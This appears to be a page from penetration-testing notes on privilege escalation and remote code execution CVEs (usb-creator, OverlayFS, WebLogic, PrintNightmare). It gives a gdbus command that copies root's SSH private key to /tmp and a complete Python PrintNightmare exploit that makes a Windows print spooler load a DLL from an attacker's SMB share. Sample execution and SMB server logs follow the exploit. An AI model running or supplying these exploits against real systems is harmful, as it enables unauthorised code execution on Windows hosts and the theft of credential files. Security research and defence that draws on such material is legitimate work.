Privilege Escalation

Linux

CVE-2015-3643: usb-creator before 0.2.38.3ubuntu0.1 on Ubuntu 12.04 LTS, before 0.2.56.3ubuntu0.1 on Ubuntu 14.04 LTS, before 0.2.62ubuntu0.3 on Ubuntu 14.10, and before 0.2.67ubuntu0.1 on Ubuntu 15.04 allows local users to gain privileges by leveraging a missing call check_polkit for the KVMTest method.
1
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image <target file> <destination>
2
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/pwn true
Copied!
CVE-2021-3493: Ubuntu OverlayFS Local Privesc.
    Ubuntu 20.10
    Ubuntu 20.04 LTS
    Ubuntu 18.04 LTS
    Ubuntu 16.04 LTS
    Ubuntu 14.04 ESM

Windows

Weblogic

CVE-2020-14882: Oracle WebLogic Remote Code Execution
Affected versions: 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
GitHub - GGyao/CVE-2020-14882_ALL: CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。
GitHub

Active Directory

PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service

GitHub - ly4k/PrintNightmare: Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527)
GitHub
GitHub - calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)
GitHub
https://github.com/afwu/PrintNightmare
github.com
GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
GitHub
1
#!/usr/bin/python3
2
from impacket.dcerpc.v5 import rprn
3
from impacket.dcerpc.v5 import transport
4
from impacket.dcerpc.v5.dtypes import NULL
5
from impacket.structure import Structure
6
import argparse
7
import sys
8
import time
9
import pathlib
10
11
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
12
class DRIVER_INFO_2_BLOB(Structure):
13
structure = (
14
('cVersion','<L'),
15
('NameOffset', '<L'),
16
('EnvironmentOffset', '<L'),
17
('DriverPathOffset', '<L'),
18
('DataFileOffset', '<L'),
19
('ConfigFileOffset', '<L'),
20
)
21
22
def __init__(self, data = None):
23
Structure.__init__(self, data = data)
24
25
def fromString(self,data):
26
Structure.fromString(self, data)
27
self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']:self['DataFileOffset']].decode('utf-16-le')
28
self['DataFileArray'] = self.rawData[self['DataFileOffset']:self['DriverPathOffset']].decode('utf-16-le')
29
self['DriverPathArray'] = self.rawData[self['DriverPathOffset']:self['EnvironmentOffset']].decode('utf-16-le')
30
self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']:self['NameOffset']].decode('utf-16-le')
31
self['NameArray'] = self.rawData[self['NameOffset']:len(self.rawData)].decode('utf-16-le')
32
33
34
def connect(username, password, domain, lmhash, nthash, address, port):
35
binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
36
rpctransport = transport.DCERPCTransportFactory(binding)
37
38
rpctransport.set_dport(port)
39
rpctransport.setRemoteHost(address)
40
41
if hasattr(rpctransport, 'set_credentials'):
42
# This method exists only for selected protocol sequences.
43
rpctransport.set_credentials(username, password, domain, lmhash, nthash)
44
45
print("[*] Connecting to {0}".format(binding))
46
try:
47
dce = rpctransport.get_dce_rpc()
48
dce.connect()
49
dce.bind(rprn.MSRPC_UUID_RPRN)
50
except:
51
print("[-] Connection Failed")
52
sys.exit(1)
53
print("[+] Bind OK")
54
return dce
55
56
57
def getDrivers(dce, handle=NULL):
58
#get drivers
59
resp = rprn.hRpcEnumPrinterDrivers(dce, pName=handle, pEnvironment="Windows x64\x00", Level=2)
60
data = b''.join(resp['pDrivers'])
61
62
#parse drivers
63
blob = DRIVER_INFO_2_BLOB()
64
blob.fromString(data)
65
#blob.dump()
66
67
return blob
68
69
70
def main(username, password, domain, lmhash, nthash, address, port, share):
71
#connect
72
dce = connect(username, password, domain, lmhash, nthash, address, port)
73
#handle = "\\\\{0}\x00".format(address)
74
handle = NULL
75
76
#find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
77
try:
78
blob = getDrivers(dce, handle)
79
pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
80
except Exception as e:
81
print('[-] Failed to enumerate remote pDriverPath')
82
print(str(e))
83
sys.exit(1)
84
85
print("[+] pDriverPath Found {0}".format(pDriverPath))
86
87
#build DRIVER_CONTAINER package
88
container_info = rprn.DRIVER_CONTAINER()
89
container_info['Level'] = 2
90
container_info['DriverInfo']['tag'] = 2
91
container_info['DriverInfo']['Level2']['cVersion'] = 3
92
container_info['DriverInfo']['Level2']['pName'] = "1234\x00"
93
container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
94
container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00'
95
container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share)
96
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"
97
98
flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
99
filename = share.split("\\")[-1]
100
print("[*] Executing {0}".format(share))
101
102
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
103
print("[*] Stage0: {0}".format(resp['ErrorCode']))
104
for i in range(1, 30):
105
try:
106
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
107
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
108
print("[*] Stage{0}: {1}".format(i, resp['ErrorCode']))
109
if (resp['ErrorCode'] == 0):
110
print("[+] Exploit Completed")
111
sys.exit()
112
except Exception as e:
113
#print(e)
114
pass
115
116
117
if __name__ == '__main__':
118
parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
119
Example;
120
./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\\\\192.168.1.215\\smb\\addCube.dll'
121
""")
122
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
123
parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
124
group = parser.add_argument_group('authentication')
125
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
126
group = parser.add_argument_group('connection')
127
group.add_argument('-target-ip', action='store', metavar="ip address",
128
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
129
'This is useful when target is the NetBIOS name and you cannot resolve it')
130
group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
131
help='Destination port to connect to SMB Server')
132
133
if len(sys.argv)==1:
134
parser.print_help()
135
sys.exit(1)
136
137
options = parser.parse_args()
138
139
import re
140
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))[email protected])?(.*)').match(
141
options.target).groups('')
142
143
#In case the password contains '@'
144
if '@' in address:
145
password = password + '@' + address.rpartition('@')[0]
146
address = address.rpartition('@')[2]
147
148
if options.target_ip is None:
149
options.target_ip = address
150
151
if domain is None:
152
domain = ''
153
154
if password == '' and username != '' and options.hashes is None:
155
from getpass import getpass
156
password = getpass("Password:")
157
158
if options.hashes is not None:
159
lmhash, nthash = options.hashes.split(':')
160
else:
161
lmhash = ''
162
nthash = ''
163
164
#re-run if stage0/stageX fails
165
print("[*] Try 1...")
166
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
167
time.sleep(10)
168
print("[*] Try 2...")
169
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
170
time.sleep(10)
171
print("[*] Try 3...")
172
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
Copied!
1
(venv) C:\home\user\PrintNighmare\CVE-2021-1675> python CVE-2021-1675.py
2
usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share
3
4
CVE-2021-1675 implementation.
5
6
positional arguments:
7
target [[domain/]username[:password]@]<targetName or address>
8
share Path to DLL. Example '\\10.10.10.10\share\evil.dll'
9
10
optional arguments:
11
-h, --help show this help message and exit
12
13
authentication:
14
-hashes LMHASH:NTHASH
15
NTLM hashes, format is LMHASH:NTHASH
16
17
connection:
18
-target-ip ip address
19
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it
20
-port [destination port]
21
Destination port to connect to SMB Server
22
23
Example;
24
./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\\192.168.1.215\smb\addCube.dll'
25
26
(venv) C:\home\user\PrintNighmare\CVE-2021-1675>
27
28
----------------EXECUTION----------------------------------------
29
30
(venv) C:\home\user\PrintNighmare\CVE-2021-1675> python CVE-2021-1675.py acme.corp/[email protected] '\\10.0.200.8\dlls\addme.dll'
31
Password:
32
[*] Try 1...
33
[*] Connecting to ncacn_np:10.0.200.6[\PIPE\spoolss]
34
[+] Bind OK
35
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
36
[*] Executing \\10.0.200.8\dlls\addme.dll
37
38
-----------------SMB SERVER---------------------------------------
39
40
(venv) C:\home\user\PrintNighmare\DLLs> impacket-smbserver -smb2support dlls .
41
Impacket v0.9.24.dev1+20210630.100536.73b9466c - Copyright 2021 SecureAuth Corporation
42
43
[*] Config file parsed
44
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
45
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
46
[*] Config file parsed
47
[*] Config file parsed
48
[*] Config file parsed
49
[*] Incoming connection (10.0.200.6,50157)
50
[*] AUTHENTICATE_MESSAGE (\,WIN-9N94NF2FA11)
51
[*] User WIN-9N94NF2FA11\ authenticated successfully
52
[*] :::00::aaaaaaaaaaaaaaaa
53
[*] Closing down connection (10.0.200.6,50157)
54
[*] Remaining connections []
55
[*] Incoming connection (10.0.200.6,50158)
56
[*] AUTHENTICATE_MESSAGE (\,WIN-9N94NF2FA11)
57
[*] User WIN-9N94NF2FA11\ authenticated successfully
58
[*] :::00::aaaaaaaaaaaaaaaa
59
[*] Closing down connection (10.0.200.6,50158)
60
[*] Remaining connections []
61
[*] Incoming connection (10.0.200.6,50159)
62
[*] AUTHENTICATE_MESSAGE (\,WIN-9N94NF2FA11)
63
[*] User WIN-9N94NF2FA11\ authenticated successfully
64
[*] :::00::aaaaaaaaaaaaaaaa
65
[*] Closing down connection (10.0.200.6,50159)
66
[*] Remaining connections []
Copied!
Last modified 3d ago